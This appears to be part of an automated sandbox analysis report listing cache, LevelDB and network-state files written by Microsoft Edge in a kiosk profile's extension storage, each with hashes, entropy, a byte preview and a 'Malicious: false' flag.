MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	524656
Entropy (8bit):	5.027445846313988E-4
Encrypted:	false
SSDEEP:	3:LsulRnkK:LsGk
MD5:	59419D2009444B4F6B5C9940265D7E0A
SHA1:	A6DB0975AB08EF270DDCC82E514E1892FF8367FD
SHA-256:	5758A5A28554A00FBB98304BF58B1F5D1036368193B42C70703857B91AEA1F71
SHA-512:	AC664E810C00D99D3F8A92F3DEC0582085ACEA35F8200C191CF8EE33F41A72C2EE322058B10366AD43466643F14378071F357C728CF6EDB50566A9791335D30C
Malicious:	false
Preview:	.........................................3..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:BxeOlE0E/CGu:+3/Cr
MD5:	461DCF41ABFC208E8F76AC0995739373
SHA1:	2C7B77F859C9F8F790A0761405E86CE317D0B843
SHA-256:	487799DF4E221DFEEBEC9CBB3803AED8CBB22D8C9AD90476CFE08C546A3CD772
SHA-512:	050EED43E147FB004EC8D98F444DB652EC6E7271AEF30DA7F71E7C6E49E6689B3724FA1E5D0CD2C351F7D25013D789039937A638B10EACCE877C6F56804C8854
Malicious:	false
Preview:	(....T;+oy retne..........................0.../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:BxeOlE0E/CGu:+3/Cr
MD5:	461DCF41ABFC208E8F76AC0995739373
SHA1:	2C7B77F859C9F8F790A0761405E86CE317D0B843
SHA-256:	487799DF4E221DFEEBEC9CBB3803AED8CBB22D8C9AD90476CFE08C546A3CD772
SHA-512:	050EED43E147FB004EC8D98F444DB652EC6E7271AEF30DA7F71E7C6E49E6689B3724FA1E5D0CD2C351F7D25013D789039937A638B10EACCE877C6F56804C8854
Malicious:	false
Preview:	(....T;+oy retne..........................0.../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.955557653394731
Encrypted:	false
SSDEEP:	3:XB3p0EQsn:nt
MD5:	BE108CA8B10FD42750D26442381A6EC1
SHA1:	C22B69B4F4BB41B87426C13A4105E805147F4E56
SHA-256:	E38FC8FF0E1F936509BAA018581330FCA19BE547DCC00AAB25F0934D9920789E
SHA-512:	9930BBB57C69BCC4045F73D9861226FBC57B1910885495AA2E61422AB1F820C18730B267E024224C3386A1103CBD0EC146489FBE7E6536A960645A38D1B3176A
Malicious:	false
Preview:	(...J.r.oy retne..........................0.../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.955557653394731
Encrypted:	false
SSDEEP:	3:XB3p0EQsn:nt
MD5:	BE108CA8B10FD42750D26442381A6EC1
SHA1:	C22B69B4F4BB41B87426C13A4105E805147F4E56
SHA-256:	E38FC8FF0E1F936509BAA018581330FCA19BE547DCC00AAB25F0934D9920789E
SHA-512:	9930BBB57C69BCC4045F73D9861226FBC57B1910885495AA2E61422AB1F820C18730B267E024224C3386A1103CBD0EC146489FBE7E6536A960645A38D1B3176A
Malicious:	false
Preview:	(...J.r.oy retne..........................0.../.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlmK/:Ls3m
MD5:	764A07852BBD55A93B8E119A20D2E4E9
SHA1:	5E08896F6743C9D68FD99FECF2EA8864BFA71A14
SHA-256:	38CCCC012848A9BA27386CFB40C07BB4D2317779E0382F2F809DB94E09CFB1C2
SHA-512:	BE5FBE22D0171FB6C0A8DD932EBF4ED1B228146D2DB530123002A8A9039DFB1A184A71B50C7587F0B5A874800A180ACC45AB6FBDF9772B6B6E1D4AF0193FB916
Malicious:	false
Preview:	........................................P[=.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlgs4Tl:Ls3gs4
MD5:	105C02405229C316229689316F13C64C
SHA1:	34147D994A7081FEB35AC8AB0D6A9E4C21B44B9B
SHA-256:	26EE06AC2956706384DB02A45A746D2C0DD7433FF5FF0BF2AB6722E6F5641819
SHA-512:	690BC7CA3AFA7325C8240AD31DBE3263C7821D9A101C2017EE2D82C7B47F41DB98B4273C080EF5C210BC11194FDC22B2812E3692681F63428C8665DA073B9348
Malicious:	false
Preview:	..........................................<.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	5.183782698859071
Encrypted:	false
SSDEEP:	6:PIteD1923oH+Tcwt0jqEKj3K/2jM8B2KLllIb9j+q2P923oH+Tcwt0jqEKj3K/2L:PIBYebqqBvFLnIbV+v4YebqqBQFUv
MD5:	D46A096603B6A1D062B4809BB29D3F64
SHA1:	31A22ED8C3CFEDE01BDD5C17E8C2A95D71A53F62
SHA-256:	FCC58CD6B2FCDBA4A3C359A1D308B89FE4D0B3A97BE98F43D8C453460A15C026
SHA-512:	0CC66DE2BD8A9EA97FDB50B85CDC35482F57A79A629E02A9A5750BE21EECD5B72696322D6817A9E9EDBFC9211AF8F63FF0FA2C734761E517FE61C17A1880BA27
Malicious:	false
Preview:	2024/09/01-00:28:13.671 1dec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..2024/09/01-00:28:15.025 1dec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0358060f-3dff-4d9b-90a9-f9b02c7b1c63.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\050919b0-aa14-4725-9134-7b2f519371b8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\47c2d5e3-ce41-426d-8dae-5646e9e5a153.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
MD5:	807419CA9A4734FEAF8D8563A003B048
SHA1:	A723C7D60A65886FFA068711F1E900CCC85922A6
SHA-256:	AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
SHA-512:	F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF49db3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF62369.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

